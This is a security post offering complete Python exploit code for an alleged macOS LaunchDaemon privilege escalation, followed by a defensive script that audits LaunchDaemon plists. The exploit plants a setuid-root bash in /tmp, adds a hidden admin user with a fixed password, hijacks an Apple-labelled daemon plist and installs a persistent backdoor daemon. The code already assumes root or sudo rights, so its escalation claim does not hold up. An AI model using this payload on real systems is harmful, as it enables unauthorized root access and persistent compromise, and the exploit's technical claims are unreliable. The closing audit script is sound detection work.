macOS LaunchDaemon Privilege Escalation Vulnerability: Analysis and Exploit

This post analyzes a privilege escalation vulnerability in the macOS LaunchDaemon subsystem on iOS 17.2 (CVE-2025-24085), including the complete Python exploit code. The exploit hijacks a system daemon's configuration to obtain root, and the write-up covers the technical details of payload creation and plist tampering.

macOS LaunchDaemon iOS 17.2 Privilege Escalation Vulnerability

Risk level: Medium
Local exploit:
Remote exploit:
CVE ID: CVE-2025-24085
CWE ID: CWE-264

```python
#!/usr/bin/env python3
# Exploit Title: macOS LaunchDaemon iOS 17.2 - Privilege Escalation
# Author: Mohammed Idrees Banyamer (@banyamer_security)
# GitHub: https://github.com/mbanyamer
# Date: 2025-05-31
# Tested on: macOS Sonoma (14.x ARM64 / x86_64)
# CVE: CVE-2025-24085
# Type: Local Privilege Escalation
# Platform: macOS
# Author Country: Jordan
# Description:
# This local privilege escalation exploit abuses a vulnerable macOS LaunchDaemon plist configuration
# to execute arbitrary commands as root. The exploit creates a root payload script, adds a root shell
# binary, creates an admin user, and installs a persistent LaunchDaemon backdoor to obtain root access.
# It hijacks the com.apple.securemonitor LaunchDaemon plist to trigger the payload,
# allowing unauthorized escalation to root on macOS Sonoma systems.

import os
import plistlib
import time
from pathlib import Path

LAUNCHD_PLIST = "/Library/LaunchDaemons/com.apple.securemonitor.plist"
PAYLOAD_SCRIPT = "/tmp/.macroot_payload.sh"

def create_payload():
    print("[+] 创建root payload脚本...")
    payload = """#!/bin/bash
# Root shell
cp /bin/bash /tmp/.rootbash
chmod +s /tmp/.rootbash
chown root:wheel /tmp/.rootbash

# Add admin user
sysadminctl -addUser pentest -password macOS123! -admin

# Log file
echo "[+] Root后门在 $(date) 触发" >> /tmp/.rootlog

# Persistent backdoor
cat <<EOF > /Library/LaunchDaemons/com.apple.backdoor.plist
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
  <key>Label</key><string>com.apple.backdoor</string>
  <key>ProgramArguments</key><array><string>/tmp/.rootbash</string></array>
  <key>RunAtLoad</key><true/>
</dict>
</plist>
EOF
chmod 644 /Library/LaunchDaemons/com.apple.backdoor.plist
chown root:wheel /Library/LaunchDaemons/com.apple.backdoor.plist
"""
    with open(PAYLOAD_SCRIPT, "w") as f:
        f.write(payload)
    os.chmod(PAYLOAD_SCRIPT, 0o755)

def hijack_launchdaemon():
    print("[+] 劫持LaunchDaemon plist...")
    if not Path(LAUNCHD_PLIST).exists():
        # Create a forged plist
        print("[*] 为漏洞利用创建伪造的LaunchDaemon plist...")
        plist_data = {
            'Label': 'com.apple.securemonitor',
            'ProgramArguments': [PAYLOAD_SCRIPT],
            'RunAtLoad': True,
        }
        with open(LAUNCHD_PLIST, "wb") as f:
            plistlib.dump(plist_data, f)
    else:
        # Hijack the existing plist
        with open(LAUNCHD_PLIST, 'rb') as f:
            plist = plistlib.load(f)
        plist['ProgramArguments'] = [PAYLOAD_SCRIPT]
        plist['RunAtLoad'] = True
        with open(LAUNCHD_PLIST, 'wb') as f:
            plistlib.dump(plist, f)

    os.system(f"chmod 644 {LAUNCHD_PLIST}")
    os.system(f"chown root:wheel {LAUNCHD_PLIST}")

def trigger_payload():
    print("[+] 手动触发LaunchDaemon...")
    os.system(f"sudo launchctl load -w {LAUNCHD_PLIST}")
    print("[+] 完成。现在可以执行 /tmp/.rootbash -p 获取root shell")

def main():
    if os.geteuid() == 0:
        print("[!] 您已经是root用户。无需利用。")
        return
    create_payload()
    hijack_launchdaemon()
    print("[+] 漏洞利用完成。重启或手动运行:")
    print(f"    sudo launchctl load -w {LAUNCHD_PLIST}")
    print("    然后运行:/tmp/.rootbash -p")

if __name__ == "__main__":
    main()
```
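From the defender's side, the hijack above leaves a recognizable footprint in `/Library/LaunchDaemons`: a plist with an Apple-looking label whose `ProgramArguments` point at a hidden script under `/tmp`, and possibly a plist not owned by root. The following audit script is an added example, not part of the original exploit or the author's code; the sample plists and the `UNTRUSTED_PREFIXES` list are constructed for illustration, and `scan_launchdaemons()` can be pointed at the real directory on a host.

```python
import os
import plistlib
import tempfile
from pathlib import Path

# Paths a root daemon should never be executing from (constructed list, extend as needed).
UNTRUSTED_PREFIXES = ("/tmp/", "/private/tmp/", "/var/tmp/", "/Users/", "/private/var/folders/")
# Prefixes where Apple-labelled (com.apple.*) daemons legitimately live.
APPLE_PROGRAM_PREFIXES = ("/System/", "/usr/", "/Library/Apple/", "/sbin/", "/bin/")

def audit_plist(path: Path, check_owner: bool = True) -> list:
    """Return findings for one LaunchDaemon plist; an empty list means nothing suspicious."""
    findings = []
    with open(path, "rb") as f:
        try:
            plist = plistlib.load(f)
        except plistlib.InvalidFileException:
            return [f"{path.name}: unparseable plist"]
    if check_owner and path.stat().st_uid != 0:
        findings.append(f"{path.name}: not owned by root (uid {path.stat().st_uid})")
    args = plist.get("ProgramArguments") or [plist.get("Program", "")]
    program = str(args[0]) if args else ""
    # Flag programs in world-writable/temp locations or hidden dotfiles (e.g. /tmp/.macroot_payload.sh).
    if program.startswith(UNTRUSTED_PREFIXES) or "/." in program:
        findings.append(f"{path.name}: program in untrusted or hidden path: {program}")
    label = str(plist.get("Label", ""))
    # An Apple-looking label running a non-Apple binary is the masquerading pattern used above.
    if label.startswith("com.apple.") and not program.startswith(APPLE_PROGRAM_PREFIXES):
        findings.append(f"{path.name}: Apple-looking label {label!r} runs non-Apple program {program}")
    return findings

def scan_launchdaemons(directory: str = "/Library/LaunchDaemons", check_owner: bool = True) -> dict:
    """Map each suspicious plist filename in the directory to its list of findings."""
    results = {}
    for p in sorted(Path(directory).glob("*.plist")):
        found = audit_plist(p, check_owner)
        if found:
            results[p.name] = found
    return results

def demo() -> dict:
    """Constructed sample: one benign daemon plus one matching the hijack pattern, in a temp dir."""
    d = tempfile.mkdtemp()
    good = {"Label": "com.example.updater", "ProgramArguments": ["/usr/local/bin/updater"], "RunAtLoad": True}
    bad = {"Label": "com.apple.securemonitor", "ProgramArguments": ["/tmp/.macroot_payload.sh"], "RunAtLoad": True}
    for name, data in (("com.example.updater.plist", good), ("com.apple.securemonitor.plist", bad)):
        with open(os.path.join(d, name), "wb") as f:
            plistlib.dump(data, f)
    # Ownership check disabled because the temp files belong to the current user, not root.
    return scan_launchdaemons(d, check_owner=False)
```

On a real host, run `scan_launchdaemons()` with the ownership check enabled and review every hit; a legitimate third-party daemon in `/Library/LaunchDaemons` should be root-owned and launch a program from a protected location.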